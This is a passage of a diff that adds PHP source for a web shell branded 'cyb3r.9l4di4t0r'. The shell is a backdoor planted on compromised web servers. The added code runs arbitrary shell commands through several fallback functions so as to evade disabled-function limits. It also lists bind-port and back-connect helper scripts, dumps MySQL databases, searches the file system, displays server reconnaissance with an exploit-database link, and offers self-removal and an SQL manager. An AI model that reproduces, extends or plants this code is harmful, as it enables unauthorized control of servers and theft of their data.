+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+
+  return fs_move_dir($d,$t);
+
+ }
+
+ elseif (is_file($d))
+
+ {
+
+  if(copy($d,$t)) {return unlink($d);}
+
+  else {unlink($t); return FALSE;}
+
+ }
+
+ else {return FALSE;}
+
+}
+
+}
+
+if (!function_exists("fs_rmdir"))
+
+{
+
+function fs_rmdir($d)
+
+{
+
+ $h = opendir($d);
+
+ while (($o = readdir($h)) !== FALSE)
+
+ {
+
+  if (($o != ".") and ($o != ".."))
+
+  {
+
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+
+  }
+
+ }
+
+ closedir($h);
+
+ rmdir($d);
+
+ return !is_dir($d);
+
+}
+
+}
+
+if (!function_exists("fs_rmobj"))
+
+{
+
+function fs_rmobj($o)
+
+{
+
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+
+ if (is_dir($o))
+
+ {
+
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+
+  return fs_rmdir($o);
+
+ }
+
+ elseif (is_file($o)) {return unlink($o);}
+
+ else {return FALSE;}
+
+}
+
+}
+
+if (!function_exists("myshellexec"))
+
+{
+
+function myshellexec($cmd)
+
+{
+
+ global $disablefunc;
+
+ $result = "";
+
+ if (!empty($cmd))
+
+ {
+
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+
+  elseif (($result = `$cmd`) !== FALSE) {}
+
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+
+  elseif (is_resource($fp = popen($cmd,"r")))
+
+  {
+
+   $result = "";
+
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+
+   pclose($fp);
+
+  }
+
+ }
+
+ return $result;
+
+}
+
+}
+
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+
+if (!function_exists("view_perms"))
+
+{
+
+function view_perms($mode)
+
+{
+
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+
+ else {$type = "?";}
+
+
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+
+ $owner["write"] = ($mode & 00200)?"w":"-";
+
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+
+ $group["read"] = ($mode & 00040)?"r":"-";
+
+ $group["write"] = ($mode & 00020)?"w":"-";
+
+ $group["execute"] = ($mode & 00010)?"x":"-";
+
+ $world["read"] = ($mode & 00004)?"r":"-";
+
+ $world["write"] = ($mode & 00002)? "w":"-";
+
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+
+}
+
+}
+
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+
+if (!function_exists("parse_perms"))
+
+{
+
+function parse_perms($mode)
+
+{
+
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+
+ else {$t = "?";}
+
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+
+}
+
+}
+
+if (!function_exists("parsesort"))
+
+{
+
+function parsesort($sort)
+
+{
+
+ $one = intval($sort);
+
+ $second = substr($sort,-1);
+
+ if ($second != "d") {$second = "a";}
+
+ return array($one,$second);
+
+}
+
+}
+
+if (!function_exists("view_perms_color"))
+
+{
+
+function view_perms_color($o)
+
+{
+
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+
+}
+
+}
+
+if (!function_exists("cyb3rgetsource"))
+
+{
+
+function cyb3rgetsource($fn)
+
+{
+
+ global $cyb3r_sourcesurl;
+
+ $array = array(
+
+  "cyb3r_bindport.pl" => "cyb3r_bindport_pl.txt",
+
+  "cyb3r_bindport.c" => "cyb3r_bindport_c.txt",
+
+  "cyb3r_backconn.pl" => "cyb3r_backconn_pl.txt",
+
+  "cyb3r_backconn.c" => "cyb3r_backconn_c.txt",
+
+  "cyb3r_datapipe.pl" => "cyb3r_datapipe_pl.txt",
+
+  "cyb3r_datapipe.c" => "cyb3r_datapipe_c.txt",
+
+ );
+
+}
+
+}
+
+if (!function_exists("mysql_dump"))
+
+{
+
+function mysql_dump($set)
+
+{
+
+ global $shver;
+
+ $sock = $set["sock"];
+
+ $db = $set["db"];
+
+ $print = $set["print"];
+
+ $nl2br = $set["nl2br"];
+
+ $file = $set["file"];
+
+ $add_drop = $set["add_drop"];
+
+ $tabs = $set["tabs"];
+
+ $onlytabs = $set["onlytabs"];
+
+ $ret = array();
+
+ $ret["err"] = array();
+
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+
+ if (empty($db)) {$db = "db";}
+
+ if (empty($print)) {$print = 0;}
+
+ if (empty($nl2br)) {$nl2br = 0;}
+
+ if (empty($add_drop)) {$add_drop = TRUE;}
+
+ if (empty($file))
+
+ {
+
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+
+ }
+
+ if (!is_array($tabs)) {$tabs = array();}
+
+ if (empty($add_drop)) {$add_drop = TRUE;}
+
+ if (sizeof($tabs) == 0)
+
+ {
+
+  // retrive tables-list
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+
+ }
+
+ $out = "# Dumped by cyb3rell.SQL v. ".$shver."
+
+# Home page: http://ccteam.ru
+
+#
+
+# Host settings:
+
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+
+# Date: ".date("d.m.Y H:i:s")."
+
+# DB: \"".$db."\"
+
+#---------------------------------------------------------
+
+";
+
+ $c = count($onlytabs);
+
+ foreach($tabs as $tab)
+
+ {
+
+  if ((in_array($tab,$onlytabs)) or (!$c))
+
+  {
+
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+
+   // recieve query for create table structure
+
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+
+   else
+
+   {
+
+    $row = mysql_fetch_row($res);
+
+    $out .= $row["1"].";\n\n";
+
+    // recieve table variables
+
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+
+    if (mysql_num_rows($res) > 0)
+
+    {
+
+     while ($row = mysql_fetch_assoc($res))
+
+     {
+
+      $keys = implode("`, `", array_keys($row));
+
+      $values = array_values($row);
+
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+
+      $values = implode("', '", $values);
+
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+
+      $out .= $sql;
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+
+ if ($file)
+
+ {
+
+  $fp = fopen($file, "w");
+
+  if (!$fp) {$ret["err"][] = 2;}
+
+  else
+
+  {
+
+   fwrite ($fp, $out);
+
+   fclose ($fp);
+
+  }
+
+ }
+
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+
+ return $out;
+
+}
+
+}
+
+if (!function_exists("mysql_buildwhere"))
+
+{
+
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+
+{
+
+ if (!is_array($array)) {$array = array();}
+
+ $result = "";
+
+ foreach($array as $k=>$v)
+
+ {
+
+  $value = "";
+
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+
+  $value .= "'".addslashes($v)."'";
+
+  if (!empty($functs[$k])) {$value .= ")";}
+
+  $result .= "`".$k."` = ".$value.$sep;
+
+ }
+
+ $result = substr($result,0,strlen($result)-strlen($sep));
+
+ return $result;
+
+}
+
+}
+
+if (!function_exists("mysql_fetch_all"))
+
+{
+
+function mysql_fetch_all($query,$sock)
+
+{
+
+ if ($sock) {$result = mysql_query($query,$sock);}
+
+ else {$result = mysql_query($query);}
+
+ $array = array();
+
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+
+ mysql_free_result($result);
+
+ return $array;
+
+}
+
+}
+
+if (!function_exists("mysql_smarterror"))
+
+{
+
+function mysql_smarterror($type,$sock)
+
+{
+
+ if ($sock) {$error = mysql_error($sock);}
+
+ else {$error = mysql_error();}
+
+ $error = htmlspecialchars($error);
+
+ return $error;
+
+}
+
+}
+
+if (!function_exists("mysql_query_form"))
+
+{
+
+function mysql_query_form()
+
+{
+
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+
+ if ((!$submit) or ($sql_act))
+
+ {
+
+  echo "<table border=0><tr><td><form name=\"cyb3r_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+
+  if ($tbl_struct)
+
+  {
+
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.cyb3r_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+
+   echo "</td></tr></table>";
+
+  }
+
+ }
+
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+
+}
+
+}
+
+if (!function_exists("mysql_create_db"))
+
+{
+
+function mysql_create_db($db,$sock="")
+
+{
+
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+
+ if ($sock) {return mysql_query($sql,$sock);}
+
+ else {return mysql_query($sql);}
+
+}
+
+}
+
+if (!function_exists("mysql_query_parse"))
+
+{
+
+function mysql_query_parse($query)
+
+{
+
+ $query = trim($query);
+
+ $arr = explode (" ",$query);
+
+ /*array array()
+
+ {
+
+  "METHOD"=>array(output_type),
+
+  "METHOD1"...
+
+  ...
+
+ }
+
+ if output_type == 0, no output,
+
+ if output_type == 1, no output if no error
+
+ if output_type == 2, output without control-buttons
+
+ if output_type == 3, output with control-buttons
+
+ */
+
+ $types = array(
+
+  "SELECT"=>array(3,1),
+
+  "SHOW"=>array(2,1),
+
+  "DELETE"=>array(1),
+
+  "DROP"=>array(1)
+
+ );
+
+ $result = array();
+
+ $op = strtoupper($arr[0]);
+
+ if (is_array($types[$op]))
+
+ {
+
+  $result["propertions"] = $types[$op];
+
+  $result["query"]  = $query;
+
+  if ($types[$op] == 2)
+
+  {
+
+   foreach($arr as $k=>$v)
+
+   {
+
+    if (strtoupper($v) == "LIMIT")
+
+    {
+
+     $result["limit"] = $arr[$k+1];
+
+     $result["limit"] = explode(",",$result["limit"]);
+
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+
+     unset($arr[$k],$arr[$k+1]);
+
+    }
+
+   }
+
+  }
+
+ }
+
+ else {return FALSE;}
+
+}
+
+}
+
+if (!function_exists("cyb3rfsearch"))
+
+{
+
+function cyb3rfsearch($d)
+
+{
+
+ global $found;
+
+ global $found_d;
+
+ global $found_f;
+
+ global $search_i_f;
+
+ global $search_i_d;
+
+ global $a;
+
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+
+ $h = opendir($d);
+
+ while (($f = readdir($h)) !== FALSE)
+
+ {
+
+  if($f != "." && $f != "..")
+
+  {
+
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+
+   if (is_dir($d.$f))
+
+   {
+
+    $search_i_d++;
+
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+
+    if (!is_link($d.$f)) {cyb3rfsearch($d.$f);}
+
+   }
+
+   else
+
+   {
+
+    $search_i_f++;
+
+    if ($bool)
+
+    {
+
+     if (!empty($a["text"]))
+
+     {
+
+      $r = @file_get_contents($d.$f);
+
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+
+      if ($a["text_not"]) {$bool = !$bool;}
+
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+
+     }
+
+     else {$found[] = $d.$f; $found_f++;}
+
+    }
+
+   }
+
+  }
+
+ }
+
+ closedir($h);
+
+}
+
+}
+
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+
+//Sending headers
+
+@ob_start();
+
+@ob_implicit_flush(0);
+
+function onphpshutdown()
+
+{
+
+ global $gzipencode,$ft;
+
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+
+ {
+
+  $v = @ob_get_contents();
+
+  @ob_end_clean();
+
+  @ob_start("ob_gzHandler");
+
+  echo $v;
+
+  @ob_end_flush();
+
+ }
+
+}
+
+function cyb3rexit()
+
+{
+
+ onphpshutdown();
+
+ exit;
+
+}
+
+
+if (empty($tmpdir))
+
+{
+
+ $tmpdir = ini_get("upload_tmp_dir");
+
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+
+}
+
+$tmpdir = realpath($tmpdir);
+
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+
+{
+
+ $safemode = TRUE;
+
+ $hsafemode = "<font color=green>ON (secure)</font>";
+  $sfmode = "<font color=green><b>ON (secure)</b></font>";
+}
+
+else {$safemode = FALSE; $hsafemode = "<font color=red>OFF (not secure)</font>"; $sfmode = "<font color=red><b>OFF (not secure)</b></font>";}
+
+$v = @ini_get("open_basedir");
+
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+if (empty($sort)) {$sort = $sort_default;}
+
+$sort[1] = strtolower($sort[1]);
+
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'[<a href="http://www.google.com/search?q='.$kernel.' '. $release.'" target=_blank ><b><u><font color="red">Google</font></u></b></a>]',htmlspecialchars($DISP_SERVER_SOFTWARE));
+
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+
+@ini_set("highlight.default",$highlight_default); //#0000BB
+
+@ini_set("highlight.html",$highlight_html); //#000000
+
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+
+@ini_set("highlight.string",$highlight_string); //#DD0000
+
+if (!is_array($actbox)) {$actbox = array();}
+
+$dspact = $act = htmlspecialchars($act);
+
+$disp_fullpath = $ls_arr = $notls = null;
+
+$ud = urlencode($d);
+
+?>
+
+<center>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr>
+<td><center><p><a href="?"><img src="http://s15.postimage.org/5oskuq363/image.png" height="68px" width="66px" border="0px"/></a><br />cyb3r.9l4di4t0r<br /><?php echo $shver; ?> </p></center></td>
+<td width="90%">
+<TABLE style="BORDER-COLLAPSE: collapse" borderColorDark=#c0c0c0 cellPadding=3 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0>
+ <tr>
+    <td width="9%" ><b>Software :</b></td>
+    <td ><b><?php echo $DISP_SERVER_SOFTWARE.' [<a href="'.$expltlink.'" target=_blank><b><u><font color="yellow">Exploit DB</font></u></b></a>]'; ?></b></td>
+    <td width="9%"><?php echo "<a href=\"".$surl."act=serverinfo\" ><b><u>Server</u> I.P.</b></a>"?></td>
+    <td width="9%"><b><?php echo getenv('SERVER_ADDR'); ?></b></td>
+ </tr>
+ <tr>
+    <td width="9%" ><?php echo "<a href=\"".$surl."act=security\" ><b><u>Uname-a</u> :</b></a>"?></td>
+    <td ><b><?php echo wordwrap(php_uname(),90,"<br>",1); ?></b></td>
+    <td width="9%"><?php echo "<a href=\"".$surl."act=clientinfo\" ><b><u>Client</u> I.P.</b></a>"?></td>
+    <td width="9%"><b><?php echo $_SERVER['REMOTE_ADDR']; ?></b></td>
+ </tr>
+ <tr>
+    <td width="9%" ><?php echo "<a href=\"".$surl."act=processes\" ><b><u>Username</u> :</b></a>"?></td>
+    <td ><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b></td>
+    <td width="9%"><?php echo "<a href=\"".$surl."act=systeminfo\" ><b><u>Sys</u>tem<u>info</u></b></a>"?></td>
+    <td width="9%"></td>
+ </tr>
+ <tr>
+    <td width="9%" ><b>Safe Mode :</b></td>
+    <td ><b><?php echo $hsafemode; ?></b></td>
+    <td width="9%"><b></b></td>
+    <td width="9%"></td>
+ </tr>
+ <tr>
+    <td width="9%" ><b>Directory :</b></td>
+    <td ><b>
+        <?php
+
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+
+$d = str_replace("\\\\","\\",$d);
+
+$dispd = htmlspecialchars($d);
+
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+
+$i = 0;
+
+foreach($pd as $b)
+
+{
+
+ $t = "";
+
+ $j = 0;
+
+ foreach ($e as $r)
+
+ {
+
+  $t.= $r.DIRECTORY_SEPARATOR;
+
+  if ($j == $i) {break;}
+
+  $j++;
+
+ }
+
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+
+ $i++;
+
+}
+
+echo "&nbsp;&nbsp;&nbsp;";
+
+if (is_writable($d))
+
+{
+
+ $wd = TRUE;
+
+ $wdt = "<font color=green>[ ok ]</font>";
+
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+
+}
+
+else
+
+{
+
+ $wd = FALSE;
+
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+
+ echo "<b>".view_perms_color($d)."</b>";
+
+}
+ ?>
+ </b></td>
+    <td width="9%"><?php echo "<a href=\"".$surl."act=selfremove\" ><b><font color='orange'>Self <u>Remove</u></font></b></a>"?></td>
+    <td width="9%"></td>
+ </tr>
+ <tr>
+    <td width="9%" ><b>Free Space :</b></td>
+    <td ><b>
+        <?php if (is_callable("disk_free_space"))
+
+{
+
+ $free = disk_free_space($d);
+
+ $total = disk_total_space($d);
+
+ if ($free === FALSE) {$free = 0;}
+
+ if ($total === FALSE) {$total = 0;}
+
+ if ($free < 0) {$free = 0;}
+
+ if ($total < 0) {$total = 0;}
+
+ $used = $total-$free;
+
+ $free_percent = round(100/($total/$free),2);
+
+ echo "<b>".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}?>
+    </b></td>
+    <td width="9%"><?php echo "<a href=\"".$surl."act=feedback\" ><b>Feed<u>back</u></b></a>"?></td>
+    <td width="9%"></td>
+ </tr>
+ <tr>
+    <td width="9%" ><b>Drives :</b></td>
+    <td ><b>
+        <?php $letters = "";
+
+if ($win)
+
+{
+
+ $v = explode("\\",$d);
+
+ $v = $v[0];
+
+ foreach (range("a","z") as $letter)
+
+ {
+
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+
+  if ($bool)
+
+  {
+
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+
+   if ($letter.":" != $v) {$letters .= $letter;}
+
+   else {$letters .= "<font color=green>".$letter."</font>";}
+
+   $letters .= " ]</a> ";
+
+  }
+
+ }
+
+ if (!empty($letters)) {echo $letters."<br>";}
+}
+ ?></b></td>
+    <td width="9%"><a href="<?php echo $self.'?logout'?>"><b><font color='green'>I'm <u>Out</u> !</font></b></a></td>
+    <td width="9%"></td>
+ </tr>
+
+ </table>
+</td>
+
+</tr>
+</table>
+
+<TABLE style="BORDER-COLLAPSE: collapse" height="1" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+            ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver">|</font>
+            PHP : <?php echo "<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>".$phpVersion."</u></b></a>"?> <font color="silver">|</font>
+            Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?>  <font color="silver">|</font>
+            Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
+            MySQL : <?php  echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver">|</font>
+            MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
+            PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver">|</font>
+            Disable functions : <?php getDisabledFunctions(); ?>        
+            </td></tr>
+</table>
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#c0c0c0 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr><td width="100%" valign="top">
+   <?php
+    if (count($quicklaunch) > 0)
+
+    {
+
+     foreach($quicklaunch as $item)
+
+     {
+
+      $item[1] = str_replace("%d",urlencode($d),$item[1]);
+
+      $item[1] = str_replace("%sort",$sort,$item[1]);
+
+      $v = realpath($d."..");
+
+      if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+
+      $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+
+      echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+
+     }
+
+    }?>
+   </td>
+  </tr>
+ </table><br>
+<?php
+
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+
+if ($act == "") {$act = $dspact = "ls";}
+
+if ($act == "sql")
+
+{
+
+ $sql_surl = $surl."act=sql";
+
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+
+ $sql_surl .= "&";
+
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
+ <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+
+ if ($sql_server)
+
+ {
+
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+
+  $err = mysql_smarterror();
+
+  @mysql_select_db($sql_db,$sql_sock);
+
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+
+ }
+
+ else {$sql_sock = FALSE;}
+
+ echo "<b>SQL Manager:</b><br>";
+
+ if (!$sql_sock)
+
+ {
+
+  if (!$sql_server) {echo "NO CONNECTION";}
+
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+
+ }
+
+ else
+
+ {
+
+  $sqlquicklaunch = array();
+
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+
